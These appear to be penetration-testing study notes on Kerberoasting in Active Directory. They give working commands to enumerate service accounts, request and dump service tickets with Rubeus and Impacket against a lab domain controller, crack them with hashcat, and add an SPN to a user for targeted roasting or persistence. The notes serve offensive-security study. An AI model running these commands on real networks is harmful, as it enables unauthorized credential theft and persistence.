4. Kerberoasting

• a.k.a TGS-REP roasting
• Client requests a service ticket generated by the DC.
• No checks are done until the ticket is used to authenticate, since it is hashed.
• If the SPN runs in the context of a computer account, managed service account, or group-managed service account, the password will be randomly generated 120 chars.
• Same is true for "krbtgt" user.
• Hence, user accounts are often the way to crack.

Enumerate Kerberoastable users:

• Setspn:

setspn.exe -Q */*

• PowerView:

Get-NetUser -SPN | select serviceprincipalname

• Rubeus:

\Rubeus.exe kerberoast /stats

Local Kerberoasting with Rubeus:

1. Start the roast:

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

2. Crack hash on kali:

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Remote Kerberoasting with Impacket:

1. Start the roast:

sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete

2. Crack hash:

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

• Note: If Impacket throughs error "KRB_AP_ERR_SKEW(Clock skew too great)", the time of Kali needs to be synchronized with the DC. Do that using "ntpdate" or "rdate".

Targeted Kerberoasting Abuse/Persistence:

Make user kerberoastable where we have write privileges:

Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose